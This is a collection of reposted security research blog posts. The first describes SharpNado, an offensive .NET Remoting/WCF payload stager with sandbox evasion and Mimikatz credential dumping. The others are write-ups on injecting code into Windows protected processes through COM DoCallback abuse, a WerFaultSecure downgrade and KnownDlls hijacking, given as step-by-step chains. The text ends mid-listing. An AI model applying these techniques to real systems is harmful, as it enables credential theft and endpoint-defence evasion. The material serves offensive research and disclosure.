SharpNado is proof of concept tool that demonstrates how one could use .Net Remoting or Windows Communication Foundation (WCF) to host smarter and dynamic .NET payloads.  SharpNado is not meant to be a full functioning, robust, payload delivery system nor is it anything groundbreaking. It’s merely something to get the creative juices flowing on how one could use these technologies or others to create dynamic and hopefully smarter payloads. I have provided a few simple examples of how this could be used to either dynamically execute base64 assemblies in memory or dynamically compile source code and execute it in memory.  This, however, could be expanded upon to include different kinds of stagers, payloads, protocols, etc.

So, what is WCF and .NET Remoting?

While going over these is beyond the scope of this blog, Microsoft describes Windows Communication Foundation as a framework for building service-oriented applications and .NET Remoting as a framework that allows objects living in different AppDomains, processes, and machines to communicate with each other.  For the sake of simplicity, let’s just say one of its use cases is it allows two applications living on different systems to share information back and forth with each other. You can read more about them here:

WCF

.NET Remoting

 A few examples of how this could be useful:

1. Smarter payloads without the bulk

What do I mean by this?  Since WCF and .NET Remoting are designed for communication between applications, it allows us to build in logic server side to make smarter decisions depending on what information the client (stager) sends back to the server.  This means our stager can still stay small and flexible but we can also build in complex rules server side that allow us to change what the stager executes depending on environmental situations.  A very simple example of payload logic would be the classic, if domain user equals X fire and if not don’t.  While this doesn’t seem very climatic, you could easily build in more complex rules.  For example, if the domain user equals X,  the internal domain is correct and user X has administrative rights, run payload Y or if user X is a standard user, and the internal domain is correct, run payload Z.  Adding to this, we could say if user X is correct, but the internal domain is a mismatch, send back the correct internal domain and let me choose if I want to fire the payload or not.  These back-end rules can be as simple or complex as you like.  I have provided a simple sandbox evasion example with SharpNado that could be expanded upon and a quick walk through of it in the examples section below.

2. Payloads can be dynamic and quickly changed on the fly:

Before diving into this, let’s talk about some traditional ways of payload delivery first and then get into how using a technology like WCF or .NET Remoting could be helpful.  In the past and even still today, many people hard-code their malicious code into the payload sent, often using some form of encryption that only decrypts and executes upon meeting some environmental variable or often they use a staged approach where the non-malicious stager reaches out to the web, retrieves our malicious code and executes it as long as environmental variables align.  The above examples are fine and still work well even today and I am in no way tearing these down at all or saying better ways don’t exist.  I am just using them as a starting point to show how I believe the below could be used as a helpful technique and up the game a bit, so just roll with it.

So what are a few of the pain points of the traditional payload delivery methods?  Well with the hard-coded payload, we usually want to keep our payloads small so the complexity of our malicious code we execute is minimal, hence the reason many use a stager as the first step of our payload.  Secondly, if we sent out 10 payloads and the first one gets caught by end point protection, then even if the other 9 also get executed by their target, they too will fail.  So, we would have to create a new payload, pick 10 new targets and again hope for the best.

Using WCF or .NET Remoting we can easily create a light stager that allows us to quickly switch between what the stager will execute.  We can do this either by back-end server logic as discussed above or by quickly setting different payloads within the SharpNado console.  So, let’s say our first payload gets blocked by endpoint protection. Since we already know our stager did try to execute our first payload due to the way the stager/server communicate we can use our deductive reason skills to conclude that our stager is good but the malicious code it tried to execute got caught. We can quickly, in the console, switch our payload to our super stealthy payload and the next time any of the stagers execute, the super stealthy payload will fire instead of the original payload which got caught. This saves us the hassle of sending a new payload to new targets.  I have provided simple examples of how to do this with SharpNado that could be expanded upon and a quick walk through of it in the examples section below.

3. Less complex to setup:

You might be thinking to yourself that I could do all this with mod rewrite rules and while that is absolutely true, mod rewrite rules can be a little more complex and time consuming to setup.  This is not meant to replace mod rewrite or anything.  Long live mod rewrite!  I am just pointing out that writing your back-end rules in a language like C# can allow easier to follow rules, modularization, and data parsing/presentation.

4. Payloads aren’t directly exposed:

What do I mean by this?  You can’t just point a web browser at your server IP and see payloads hanging out in some open web directory to be analyzed/downloaded.  In order to capture payloads, you would have to have some form of MiTM between the stager and the server.  This is because when using WCF or .NET Remoting, the malicious code (payload) you want your stager to execute along with any complex logic we want to run sits behind our remote server interface.  That remote interface exposes only the remote server side methods which can then be called by your stager. Now, if at this point you are thinking WTF, I encourage you to review the above links and dive deeper into how WCF or .NET Remoting works.  As there are many people who explain it and understand it better than I ever will.

Keep in mind, that you would still want to encrypt all of your payloads before they are sent over the wire to better protect your payloads.  You would also want to use other evasion techniques, for example, amount of times the stager has been called or how much time has passed since the stager was sent, etc.

5. Been around awhile:

.NET Remoting and WCF have been around a long time. There are tons of examples out there from developers on lots of ways to use this technology legitimately and it is probably a pretty safe bet that there are still a lot of organizations using this technology in legit applications. Like you, I like exposing ways one might do evil with things people use for legit purposes and hopefully bring them to light. Lastly, the above concepts could be used with other technologies as well, this just highlights one of many ways to accomplish the same goal.
Examples:

Simple dynamic + encrypted payload example:

In the first example we will use SharpNado to host a base64 version of SharpSploitConsole and execute Mimikatz logonpasswords function.  First, we will setup our XML payload template that the server will be able to use when our stager executes.  Payload template examples can be found on GitHub in the Payloads folder.  Keep in mind that the ultimate goal would be to have many payload templates already setup that you could quickly switch between. The below screenshots give an example of what the template would look like.

Template example:

This is what it would look like after pasting in base64 code and setting arguments:

Once we have our template payload setup, we can go ahead and run SharpNado_x64.exe (with Administrator rights) and setup our listening service that our stager will call out to. In this example we will use WCF over HTTP on port 8080.  So, our stager should be setup to connect to http://192.168.55.250:8080/Evil.  I would like to note two things here.  First is that with a little bit of work upfront server side, this could be modified to support HTTPS and secondly, SharpNado does not depend on the templates being setup prior to running.  You can add/delete/modify templates any time while the server is running using whatever text editor you would like.

Now let’s see what payloads we currently have available.  Keep in mind you may use any naming scheme you would like for your payloads.  I suggest naming payloads and stagers what makes most sense to you.  I only named them this way to make it easier to follow along.

In this example I will be using the b64SharpSploitConsole payload and have decided that I want the payload to be encrypted server side and decrypted client side using the super secure password P@55w0rd.  I would like to note here (outlined in red) that it is important for you to set your payload directory correctly.  This directory is what SharpNado uses to pull payloads.  A good way to test this is to run the command «show payloads» and if your payloads show up, you know you set it correctly.

Lastly, we will setup our stager.  Since I am deciding to encrypt our payload, I will be using the example SharpNado_HTTP_WCF_Base64_Encrypted.cs stager example found in the Stagers folder on GitHub.  I will simply be compiling this and running the stager exe but this could be delivered via .NetToJavaScript or by some other means if you like.

Now that we have compiled our stager, we will start the SharpNado service by issuing the «run» command.  This shows us what interface is up and what the service is listening on, so it is good to check this to make sure again, that everything is setup correctly.

Now when our stager gets executed, we should see the below.

And on our server side we can see that the encrypted server method was indeed called by our stager.  Keep in mind, we can build in as much server logic as we like.  This is just an example.

Now for demo purposes, I will quickly change the payload to b64NoPowershell_ipconfig_1 and when we run the same exact stager again, we instead will show our ipconfig information.  Again, this is only for simple demonstration of how you can quickly change out payloads.

Simple sandbox evade example:

In this second example I will go over an extremely watered-down version of how you could use SharpNado to build smarter payloads.  The example provided with SharpNado is intended to be a building block and could be made as complex or simple as you like.  Since our SharpNado service is already running from or previous example, all we need to do is set our payloads to use in the SharpNado console.  For this example, I again will be using the same payloads from above. I will run the b64SharpSploitConsole payload if we hit our correct target and the b64NoPowershell_ipconfig_1 payload if we don’t hit our correct target.

Looking at our simple stager example below we can see that if the user anthem is who executed our stager, the stager will send a 1 back to the SharpNado service or a 0 will be sent if the user isn’t anthem.  Please keep in mind you could however send back any information you like, including username, domain, etc.

Below is a partial screenshot of the example logic I provided with SharpNado. Another thing I want to point out is that I provided an example of how you could count how many times the service method has been called and depending on threshold kill the service.  This would be an example of building in counter measures if we think we are being analyzed and/or sand-boxed.

Moving forward when we run our stager with our anthem user, we can see that we get a message server side and that the correct payload fired.

Now if I change the user to anthem2 and go through the process again.  We can see that our non-malicious payload fires.  Keep in mind, the stagers could be setup in a way that values aren’t hard coded in.  You could have a list of users on your server and have your stager loop through that list and if anything matches, execute and if not do something else.  Again, it’s really up to your imagination.

Compile source code on the fly example:

Let’s do one more quick example but using C# source code.  This stager method will use System.CodeDom.Compiler which does shortly drop stuff to disk right before executing in memory but one could create a stager that takes advantage of the open source C# and VB compiler Roslyn to do the same thing.  This doesn’t touch disk as pointed out by @cobbr_io in his SharpShell blog post.

The below payload template example runs a No PowerShell payload that executes ipconfig but I also provided an example that would execute a PowerShell Empire or PowerShell Cobalt Strike Beacon on GitHub:

Then we will setup our stager.  In this example I will use the provided GitHub stager SharpNado_HTTP_WCF_SourceCompile.cs.

We will then take our already running SharpNado service and quickly add our payload.

Now when we run our stager, we should see our ipconfig output.

Conclusion:

Hopefully this has been a good intro to how one could use WCF or .NET Remoting offensively or at least sparked a few ideas for you to research on your own. I am positive that there are much better ways to accomplish this, but it was something that I came across while doing other research and I thought it would be neat to whip up a small POC.  Till next time and happy hacking!

Link to tools:

SharpNado — https://github.com/anthemtotheego/SharpNado

SharpNado Compiled Binaries — https://github.com/anthemtotheego/SharpNado/tree/master/CompiledBinaries

SharpSploitConsole — https://github.com/anthemtotheego/SharpSploitConsole

SharpSploit — https://github.com/cobbr/SharpSploit

Injecting Code into Windows Protected Processes using COM — Part 2

( Original text by James Forshaw )

In my previous blog I discussed a technique which combined numerous issues I’ve previously reported to Microsoft to inject arbitrary code into a PPL-WindowsTCB process. The techniques presented don’t work for exploiting the older, stronger Protected Processes (PP) for a few different reasons. This blog seeks to remedy this omission and provide details of how I was able to also hijack a full PP-WindowsTCB process without requiring administrator privileges. This is mainly an academic exercise, to see whether I can get code executing in a full PP as there’s not much more you can do inside a PP over a PPL.As a quick recap of the previous attack, I was able to identify a process which would run as PPL which also exposed a COM service. Specifically, this was the “.NET Runtime Optimization Service” which ships with the .NET framework and uses PPL at CodeGen level to apply cached signing levels to Ahead-of-Time compiled DLLs to allow them to be used with User-Mode Code Integrity (UMCI). By modifying the COM proxy configuration it was possible to induce a type confusion which allowed me to load an arbitrary DLL by hijacking the KnownDlls configuration. Once running code inside the PPL I could abuse a bug in the cached signing feature to create a DLL signed to load into any PPL and through that escalate to PPL-WindowsTCB level.

Finding a New Target

My first thought to exploit full PP would be to use the additional access we were granted from having code running at PPL-WindowsTCB. You might assume you could abuse the cached signed DLL to bypass security checks to load into a full PP. Unfortunately the kernel’s Code Integrity module ignores cached signing levels for full PP. How about KnownDlls in general? If we have administrator privileges and code running in PPL-WindowsTCB we can directly write to the KnownDlls object directory (see another of my blog posts link for why you need to be PPL) and try to get the PP to load an arbitrary DLL. Unfortunately, as I mentioned in the previous blog, this also doesn’t work as full PP ignores KnownDlls. Even if it did load KnownDlls I don’t want to require administrator privileges to inject code into the process.I decided that it’d make sense to rerun my PowerShell script from the previous blog to discover which executables will run as full PP and at what level. On Windows 10 1803 there’s a significant number of executables which run as PP-Authenticode level, however only four executables would start with a more privileged level as shown in the following table.

PathSigning Level
C:\windows\system32\GenValObj.exeWindows
C:\windows\system32\sppsvc.exeWindows
C:\windows\system32\WerFaultSecure.exeWindowsTCB
C:\windows\system32\SgrmBroker.exeWindowsTCB

As I have no known route from PP-Windows level to PP-WindowsTCB level like I had with PPL, only two of the four executables are of interest, WerFaultSecure.exe and SgrmBroker.exe. I correlated these two executables against known COM service registrations, which turned up no results. That doesn’t mean these executables don’t expose a COM attack surface, the .NET executable I abused last time also doesn’t register its COM service, so I also performed some basic reverse engineering looking for COM usage.The SgrmBroker executable doesn’t do very much at all, it’s a wrapper around an isolated user mode application to implement runtime attestation of the system as part of Windows Defender System Guard and didn’t call into any COM APIs. WerFaultSecure also doesn’t seem to call into COM, however I already knew that WerFaultSecure can load COM objects, as Alex Ionescu used my original COM scriptlet code execution attack to get PPL-WindowsTCB level though hijacking a COM object load in WerFaultSecure. Even thoughWerFaultSecure didn’t expose a service if it could initialize COM perhaps there was something that I could abuse to get arbitrary code execution? To understand the attack surface of COM we need to understand how COM implements out-of-process COM servers and COM remoting in general.

Digging into COM Remoting Internals

Communication between a COM client and a COM server is over the MSRPC protocol, which is based on the Open Group’s DCE/RPC protocol. For local communication the transport used is Advanced Local Procedure Call (ALPC) ports. At a high level communication occurs between a client and server based on the following diagram:

In order for a client to find the location of a server the process registers an ALPC endpoint with the DCOM activator in RPCSS ①. This endpoint is registered alongside the Object Exporter ID (OXID) of the server, which is a 64 bit randomly generated number assigned by RPCSS. When a client wants to connect to a server it must first ask RPCSS to resolve the server’s OXID value to an RPC endpoint ②. With the knowledge of the ALPC RPC endpoint the client can connect to the server and call methods on the COM object ③.The OXID value is discovered either from an out-of-process (OOP) COM activation result or via a marshaledObject Reference (OBJREF) structure. Under the hood the client calls the ResolveOxid method on RPCSS’sIObjectExporter RPC interface. The prototype of ResolveOxid is as follows:interface IObjectExporter {  // …  error_status_t ResolveOxid([in] handle_t hRpc,[in] OXID* pOxid,[in] unsigned short cRequestedProtseqs,[in] unsigned short arRequestedProtseqs[],[out, ref] DUALSTRINGARRAY** ppdsaOxidBindings,[out, ref] IPID* pipidRemUnknown,[out, ref] DWORD* pAuthnHint);In the prototype we can see the OXID to resolve is being passed in the pOxid parameter and the server returns an array of Dual String Bindings which represent RPC endpoints to connect to for this OXID value. The server also returns two other pieces of information, an Authentication Level Hint (pAuthnHint) which we can safely ignore and the IPID of the IRemUnknown interface (pipidRemUnknown) which we can’t.An IPID is a GUID value called the Interface Process ID. This represents the unique identifier for a COM interface inside the server, and it’s needed to communicate with the correct COM object as it allows the single RPC endpoint to multiplex multiple interfaces over one connection. The IRemUnknown interface is a default COM interface every COM server must implement as it’s used to query for new IPIDs on an existing object (using RemQueryInterface) and maintain the remote object’s reference count (through RemAddRefand RemRelease methods). As this interface must always exist regardless of whether an actual COM server is exported and the IPID can be discovered through resolving the server’s OXID, I wondered what other methods the interface supported in case there was anything I could leverage to get code execution.The COM runtime code maintains a database of all IPIDs as it needs to lookup the server object when it receives a request for calling a method. If we know the structure of this database we could discover where the IRemUnknown interface is implemented, parse its methods and find out what other features it supports. Fortunately I’ve done the work of reverse engineering the database format in my OleViewDotNet tool, specifically the command Get-ComProcess in the PowerShell module. If we run the command against a process which uses COM, but doesn’t actually implement a COM server (such as notepad) we can try and identify the correct IPID.

In this example screenshot there’s actually two IPIDs exported, IRundown and a Windows.Foundationinterface. The Windows.Foundation interface we can safely ignore, but IRundown looks more interesting. In fact if you perform the same check on any COM process you’ll discover they also have IRundown interfaces exported. Are we not expecting an IRemUnknown interface though? If we pass the ResolveMethodNamesand ParseStubMethods parameters to Get-ComProcess, the command will try and parse method parameters for the interface and lookup names based on public symbols. With the parsed interface data we can pass the IPID object to the Format-ComProxy command to get a basic text representation of theIRundown interface. After cleanup the IRundown interface looks like the following:[uuid(«00000134-0000-0000-c000-000000000046»)]interface IRundown : IUnknown {   HRESULT RemQueryInterface(…);   HRESULT RemAddRef(…);   HRESULT RemRelease(…);   HRESULT RemQueryInterface2(…);   HRESULT RemChangeRef(…);   HRESULT DoCallback([in] struct XAptCallback* pCallbackData);   HRESULT DoNonreentrantCallback([in] struct XAptCallback* pCallbackData);   HRESULT AcknowledgeMarshalingSets(…);   HRESULT GetInterfaceNameFromIPID(…);   HRESULT RundownOid(…);}This interface is a superset of IRemUnknown, it implements the methods such as RemQueryInterface and then adds some more additional methods for good measure. What really interested me was the DoCallbackand DoNonreentrantCallback methods, they sound like they might execute a “callback” of some sort. Perhaps we can abuse these methods? Let’s look at the implementation of DoCallback based on a bit of RE (DoNonreentrantCallback just delegates to DoCallback internally so we don’t need to treat it specially):struct XAptCallback { void* pfnCallback; void* pParam; void* pServerCtx; void* pUnk; void* iid; int   iMethod; GUID  guidProcessSecret;};HRESULT CRemoteUnknown::DoCallback(XAptCallback *pCallbackData){ CProcessSecret::GetProcessSecret(&pguidProcessSecret);if(!memcmp(&pguidProcessSecret,&pCallbackData->guidProcessSecret,sizeof(GUID))){if(pCallbackData->pServerCtx == GetCurrentContext()){return pCallbackData->pfnCallback(pCallbackData->pParam);}else{return SwitchForCallback(                  pCallbackData->pServerCtx,                  pCallbackData->pfnCallback,                  pCallbackData->pParam);}}return E_INVALIDARG;}This method is very interesting, it takes a structure containing a pointer to a method to call and an arbitrary parameter and executes the pointer. The only restrictions on calling the arbitrary method is you must know ahead of time a randomly generated GUID value, the process secret, and the address of a server context. The checking of a per-process random value is a common security pattern in COM APIs and is typically used to restrict functionality to only in-process callers. I abused something similar in the Free-Threaded Marshaler way back in 2014.What is the purpose of DoCallback? The COM runtime creates a new IRundown interface for every COM apartment that’s initialized. This is actually important as calling methods between apartments, say calling a STA object from a MTA, you need to call the appropriate IRemUnknown methods in the correct apartment. Therefore while the developers were there they added a few more methods which would be useful for calling between apartments, including a general “call anything you like” method. This is used by the internals of the COM runtime and is exposed indirectly through methods such as CoCreateObjectInContext. To prevent theDoCallback method being abused OOP the per-process secret is checked which should limit it to only in-process callers, unless an external process can read the secret from memory.

Abusing DoCallback

We have a primitive to execute arbitrary code within any process which has initialized COM by invoking theDoCallback method, which should include a PP. In order to successfully call arbitrary code we need to know four pieces of information:

  1. The ALPC port that the COM process is listening on.
  2. The IPID of the IRundown interface.
  3. The initialized process secret value.
  4. The address of a valid context, ideally the same value that GetCurrentContext returns to call on the same RPC thread.

Getting the ALPC port and the IPID is easy, if the process exposes a COM server, as both will be provided during OXID resolving. Unfortunately WerFaultSecure doesn’t expose a COM object we can create so that angle wouldn’t be open to us, leaving us with a problem we need to solve. Extracting the process secret and context value requires reading the contents of process memory. This is another problem, one of the intentional security features of PP is preventing a non-PP process from reading memory from a PP process. How are we going to solve these two problems?Talking this through with Alex at Recon we came up with a possible attack if you have administrator access. Even being an administrator doesn’t allow you to read memory directly from a PP process. We could have loaded a driver, but that would break PP entirely, so we considered how to do it without needing kernel code execution.First and easiest, the ALPC port and IPID can be extracted from RPCSS. The RPCSS service does not run protected (even PPL) so this is possible to do without any clever tricks other than knowing where the values are stored in memory. For the context pointer, we should be able to brute force the location as there’s likely to be only a narrow range of memory locations to test, made slightly easier if we use the 32 bit version ofWerFaultSecure.Extracting the secret is somewhat harder. The secret is initialized in writable memory and therefore ends up in the process’ working set once it’s modified. As the page isn’t locked it will be eligible for paging if the memory conditions are right. Therefore if we could force the page containing the secret to be paged to disk we could read it even though it came from a PP process. As an administrator, we can perform the following to steal the secret:

  1. Ensure the secret is initialized and the page is modified.
  2. Force the process to trim its working set, this should ensure the modified page containing the secret ends up paged to disk (eventually).
  3. Create a kernel memory crash dump file using the NtSystemDebugControl system call. The crash dump can be created by an administrator without kernel debugging being enabled and will contain all live memory in the kernel. Note this doesn’t actually crash the system.
  4. Parse the crash dump for the Page Table Entry of the page containing the secret value. The PTE should disclose where in the paging file on disk the paged data is located.
  5. Open the volume containing the paging file for read access, parse the NTFS structures to find the paging file and then find the paged data and extract the secret.

After coming up with this attack it seemed far too much like hard work and needed administrator privileges which I wanted to avoid. I needed to come up with an alternative solution.

Using WerFaultSecure for its Original Purpose

Up to this point I’ve been discussing WerFaultSecure as a process that can be abused to get arbitrary code running inside a PP/PPL. I’ve not really described why the process can run at the maximum PP/PPL levels.WerFaultSecure is used by the Windows Error Reporting service to create crash dumps from protected processes. Therefore it needs to run at elevated PP levels to ensure it can dump any possible user-mode PP. Why can we not just get WerFaultSecure to create a crash dump of itself, which would leak the contents of process memory and allow us to extract any information we require?The reason we can’t use WerFaultSecure is it encrypts the contents of the crash dump before writing it to disk. The encryption is done in a way to only allow Microsoft to decrypt the crash dump, using asymmetric encryption to protect a random session key which can be provided to the Microsoft WER web service. Outside of a weakness in Microsoft’s implementation or a new cryptographic attack against the primitives being used getting the encrypted data seems like a non-starter.However, it wasn’t always this way. In 2014 Alex presented at NoSuchCon about PPL and discussed a bug he’d discovered in how WerFaultSecure created encrypted dump files. It used a two step process, first it wrote out the crash dump unencrypted, then it encrypted the crash dump. Perhaps you can spot the flaw? It was possible to steal the unencrypted crash dump. Due to the way WerFaultSecure was called it accepted two file handles, one for the unencrypted dump and one for the encrypted dump. By calling WerFaultSecure directly the unencrypted dump would never be deleted which means that you don’t even need to race the encryption process.There’s one problem with this, it was fixed in 2015 in MS15-006. After that fix WerFaultSecure encrypted the crash dump directly, it never ends up on disk unencrypted at any point. But that got me thinking, while they might have fixed the bug going forward what prevents us from taking the old vulnerable version ofWerFaultSecure from Windows 8.1 and executing it on Windows 10? I downloaded the ISO for Windows 8.1 from Microsoft’s website (link), extracted the binary and tested it, with predictable results:

We can take the vulnerable version of WerFaultSecure from Windows 8.1 and it will run quite happily on Windows 10 at PP-WindowsTCB level. Why? It’s unclear, but due to the way PP is secured all the trust is based on the signed executable. As the signature of the executable is still valid the OS just trusts it can be run at the requested protection level. Presumably there must be some way that Microsoft can block specific executables, although at least they can’t just revoke their own signing certificates. Perhaps OS binaries should have an EKU in the certificate which indicates what version they’re designed to run on? After all Microsoft already added a new EKU when moving from Windows 8 to 8.1 to block downgrade attacks to bypass WinRT UMCI signing so generalizing might make some sense, especially for certain PP levels.After a little bit of RE and reference to Alex’s presentation I was able to work out the various parameters I needed to be passed to the WerFaultSecure process to perform a dump of a PP:

ParameterDescription
/hEnable secure dump mode.
/pid {pid}Specify the Process ID to dump.
/tid {tid}Specify the Thread ID in the process to dump.
/file {handle}Specify a handle to a writable file for the unencrypted crash dump
/encfile {handle}Specify a handle to a writable file for the encrypted crash dump
/cancel {handle}Specify a handle to an event to indicate the dump should be cancelled
/type {flags}Specify MIMDUMPTYPE flags for call to MiniDumpWriteDump

This gives us everything we need to complete the exploit. We don’t need administrator privileges to start the old version of WerFaultSecure as PP-WindowsTCB. We can get it to dump another copy of WerFaultSecurewith COM initialized and use the crash dump to extract all the information we need including the ALPC Port and IPID needed to communicate. We don’t need to write our own crash dump parser as the Debug Engine API which comes installed with Windows can be used. Once we’ve extracted all the information we need we can call DoCallback and invoke arbitrary code.

Putting it All Together

There’s still two things we need to complete the exploit, how to get WerFaultSecure to start up COM and what we can call to get completely arbitrary code running inside the PP-WindowsTCB process.Let’s tackle the first part, how to get COM started. As I mentioned earlier, WerFaultSecure doesn’t directly call any COM methods, but Alex had clearly used it before so to save time I just asked him. The trick was to get WerFaultSecure to dump an AppContainer process, this results in a call to the methodCCrashReport::ExemptFromPlmHandling inside the FaultRep DLL resulting in the loading of CLSID{07FC2B94-5285-417E-8AC3-C2CE5240B0FA}, which resolves to an undocumented COM object. All that matters is this allows WerFaultSecure to initialize COM.Unfortunately I’ve not been entirely truthful during my description of how COM remoting is setup. Just loading a COM object is not always sufficient to initialize the IRundown interface or the RPC endpoint. This makes sense, if all COM calls are to code within the same apartment then why bother to initialize the entire remoting code for COM. In this case even though we can make WerFaultSecure load a COM object it doesn’t meet the conditions to setup remoting. What can we do to convince the COM runtime that we’d really like it to initialize? One possibility is to change the COM registration from an in-process class to an OOP class. As shown in the screenshot below the COM registration is being queried first from HKEY_CURRENT_USER which means we can hijack it without needing administrator privileges.

Unfortunately looking at the code this won’t work, a cut down version is shown below:HRESULT CCrashReport::ExemptFromPlmHandling(DWORD dwProcessId){ CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); IOSTaskCompletion* inf; HRESULT hr = CoCreateInstance(CLSID_OSTaskCompletion,NULL, CLSCTX_INPROC_SERVER, IID_PPV_ARGS(&inf));if(SUCCEEDED(hr)){   // Open process and disable PLM handling. }}The code passes the flag, CLSCTX_INPROC_SERVER to CoCreateInstance. This flag limits the lookup code in the COM runtime to only look for in-process class registrations. Even if we replace the registration with one for an OOP class the COM runtime would just ignore it. Fortunately there’s another way, the code is initializing the current thread’s COM apartment as a STA using the COINIT_APARTMENTTHREADED flag with CoInitializeEx. Looking at the registration of the COM object its threading model is set to “Both”. What this means in practice is the object supports being called directly from either a STA or a MTA.However, if the threading model was instead set to “Free” then the object only supports direct calls from an MTA, which means the COM runtime will have to enable remoting, create the object in an MTA (using something similar to DoCallback) then marshal calls to that object from the original apartment. Once COM starts remoting it initializes all remote features including IRundown. As we can hijack the server registration we can just change the threading model, this will cause WerFaultSecure to start COM remoting which we can now exploit.What about the second part, what can we call inside the process to execute arbitrary code? Anything we call using DoCallback must meet the following criteria, to avoid undefined behavior:

  1. Only takes one pointer sized parameter.
  2. Only the lower 32 bits of the call are returned as the HRESULT if we need it.
  3. The callsite is guarded by CFG so it must be something which is a valid indirect call target.

As WerFaultSecure isn’t doing anything special then at a minimum any DLL exported function should be a valid indirect call target. LoadLibrary clearly meets our criteria as it takes a single parameter which is a pointer to the DLL path and we don’t really care about the return value so the truncation isn’t important. We can’t just load any DLL as it must be correctly signed, but what about hijacking KnownDlls?Wait, didn’t I say that PP can’t load from KnownDlls? Yes they can’t but only because the value of theLdrpKnownDllDirectoryHandle global variable is always set to NULL during process initialization. When the DLL loader checks for the presence of a known DLL if the handle is NULL the check returns immediately. However if the handle has a value it will do the normal check and just like in PPL no additional security checks are performed if the process maps an image from an existing section object. Therefore if we can modify the LdrpKnownDllDirectoryHandle global variable to point to a directory object inherited into the PP we can get it to load an arbitrary DLL.The final piece of the puzzle is finding an exported function which we can call to write an arbitrary value into the global variable. This turns out to be harder than expected. The ideal function would be one which takes a single pointer value argument and writes to that location with no other side effects. After a number of false starts (including trying to use gets) I settled on the pair, SetProcessDefaultLayout andGetProcessDefaultLayout in USER32. The set function takes a single value which is a set of flags and stores it in a global location (actually in the kernel, but good enough). The get method will then write that value to an arbitrary pointer. This isn’t perfect as the values we can set and therefore write are limited to the numbers 0-7, however by offsetting the pointer in the get calls we can write a value of the form 0x0?0?0?0? where the ?can be any value between 0 and 7. As the value just has to refer to the handle inside a process under our control we can easily craft the handle to meet these strict requirements.

Wrapping Up

In conclusion to get arbitrary code execution inside a PP-WindowsTCB without administrator privileges process we can do the following:

  1. Create a fake KnownDlls directory, duplicating the handle until it meets a pattern suitable for writing through Get/SetProcessDefaultLayout. Mark the handle as inheritable.
  2. Create the COM object hijack for CLSID {07FC2B94-5285-417E-8AC3-C2CE5240B0FA} with the ThreadingModel set to “Free”.
  3. Start Windows 10 WerFaultSecure at PP-WindowsTCB level and request a crash dump from an AppContainer process. During process creation the fake KnownDlls must be added to ensure it’s inherited into the new process.
  4. Wait until COM has initialized then use Windows 8.1 WerFaultSecure to dump the process memory of the target.
  5. Parse the crash dump to discover the process secret, context pointer and IPID for IRundown.
  6. Connect to the IRundown interface and use DoCallback with Get/SetProcessDefaultLayout to modify the LdrpKnownDllDirectoryHandle global variable to the handle value created in 1.
  7. Call DoCallback again to call LoadLibrary with a name to load from our fake KnownDlls.

This process works on all supported versions of Windows 10 including 1809. It’s worth noting that invokingDoCallback can be used with any process where you can read the contents of memory and the process has initialized COM remoting. For example, if you had an arbitrary memory disclosure vulnerability in a privileged COM service you could use this attack to convert the arbitrary read into arbitrary execute. As I don’t tend to look for memory corruption/memory disclosure vulnerabilities perhaps this behavior is of more use to others.
That concludes my series of attacking Windows protected processes. I think it demonstrates that preventing a user from attacking processes which share resources, such as registry and files is ultimately doomed to fail. This is probably why Microsoft do not support PP/PPL as a security boundary. Isolated User Mode seems a much stronger primitive, although that does come with additional resource requirements which PP/PPL doesn’t for the most part.  I wouldn’t be surprised if newer versions of Windows 10, by which I mean after version 1809, will try to mitigate these attacks in some way, but you’ll almost certainly be able to find a bypass.

Injecting Code into Windows Protected Processes using COM — Part 1

( Original text by James Forshaw )

At Recon Montreal 2018 I presented “Unknown Known DLLs and other Code Integrity Trust Violations” withAlex Ionescu. We described the implementation of Microsoft Windows’ Code Integrity mechanisms and how Microsoft implemented Protected Processes (PP). As part of that I demonstrated various ways of bypassing Protected Process Light (PPL), some requiring administrator privileges, others not.In this blog I’m going to describe the process I went through to discover a way of injecting code into a PPL on Windows 10 1803. As the only issue Microsoft considered to be violating a defended security boundary has now been fixed I can discuss the exploit in more detail.

Background on Windows Protected Processes

The origins of the Windows Protected Process (PP) model stretch back to Vista where it was introduced to protect DRM processes. The protected process model was heavily restricted, limiting loaded DLLs to a subset of code installed with the operating system. Also for an executable to be considered eligible to be started protected it must be signed with a specific Microsoft certificate which is embedded in the binary. One protection that the kernel enforced is that a non-protected process couldn’t open a handle to a protected process with enough rights to inject arbitrary code or read memory.In Windows 8.1 a new mechanism was introduced, Protected Process Light (PPL), which made the protection more generalized. PPL loosened some of the restrictions on what DLLs were considered valid for loading into a protected process and introduced different signing requirements for the main executable. Another big change was the introduction of a set of signing levels to separate out different types of protected processes. A PPL in one level can open for full access any process at the same signing level or below, with a restricted set of access granted to levels above. These signing levels were extended to the old PP model, a PP at one level can open all PP and PPL at the same signing level or below, however the reverse was not true, a PPL can never open a PP at any signing level for full access. Some of the levels and this relationship are shown below:

Signing levels allow Microsoft to open up protected processes to third-parties, although at the current time the only type of protected process that a third party can create is an Anti-Malware PPL. The Anti-Malware level is special as it allows the third party to add additional permitted signing keys by registering an Early Launch Anti-Malware (ELAM) certificate. There is also Microsoft’s TruePlay, which is an Anti-Cheat technology for games which uses components of PPL but it isn’t really important for this discussion.I could spend a lot of this blog post describing how PP and PPL work under the hood, but I recommend reading the blog post series by Alex Ionescu instead (Parts 12 and 3) which will do a better job. While the blog posts are primarily based on Windows 8.1, most of the concepts haven’t changed substantially in Windows 10.I’ve written about Protected Processes before [link], in the form of the custom implementation by Oracle in their VirtualBox virtualization platform on Windows. The blog showed how I bypassed the process protection using multiple different techniques. What I didn’t mention at the time was the first technique I described, injecting JScript code into the process, also worked against Microsoft’s PPL implementation. I reported that I could inject arbitrary code into a PPL to Microsoft (see Issue 1336) from an abundance of caution in case Microsoft wanted to fix it. In this case Microsoft decided it wouldn’t be fixed as a security bulletin. However Microsoft did fix the issue in the next major release on Windows (version 1803) by adding the following code to CI.DLL, the Kernel’s Code Integrity library:UNICODE_STRING g_BlockedDllsForPPL[]={
 DECLARE_USTR(«scrobj.dll»),
 DECLARE_USTR(«scrrun.dll»),
 DECLARE_USTR(«jscript.dll»),
 DECLARE_USTR(«jscript9.dll»),
 DECLARE_USTR(«vbscript.dll»)
};

NTSTATUS CipMitigatePPLBypassThroughInterpreters(PEPROCESS Process,
                                                LPBYTE Image,
                                                SIZE_T ImageSize){
if(!PsIsProtectedProcess(Process))
return STATUS_SUCCESS;

 UNICODE_STRING OriginalImageName;
 // Get the original filename from the image resources.
 SIPolicyGetOriginalFilenameAndVersionFromImageBase(
     Image, ImageSize,&OriginalImageName);
for(int i = 0; i < _countof(g_BlockedDllsForPPL);++i){
